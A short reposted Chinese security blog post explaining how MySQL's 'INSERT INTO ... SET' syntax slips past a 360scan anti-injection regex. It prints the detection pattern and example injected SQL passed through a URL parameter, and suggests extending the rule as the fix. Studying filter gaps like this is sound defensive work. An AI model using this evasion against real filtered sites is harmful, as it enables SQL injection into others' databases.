Mysql Insert into set 语法绕过 360scan insert 防注入

admin
admin
admin
100797
文章
86
评论
2021年4月2日20:09:03评论158 views字数 371阅读1分14秒阅读模式

360scan正则:INSERT\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =

提交: 

http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')

提交set语法: 

http://localhost/360.php?sql=insert into user set user='admin',pass='123456'

修复方法当然最好是加上set了。

[原文地址]

留言评论(旧系统):

rockknife @ 2014-04-24 19:50:53

可以啊

本站回复:

文章来源于lcx.cc:Mysql Insert into set 语法绕过 360scan insert 防注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日20:09:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Mysql Insert into set 语法绕过 360scan insert 防注入https://cn-sec.com/archives/316997.html

发表评论

匿名网友 填写信息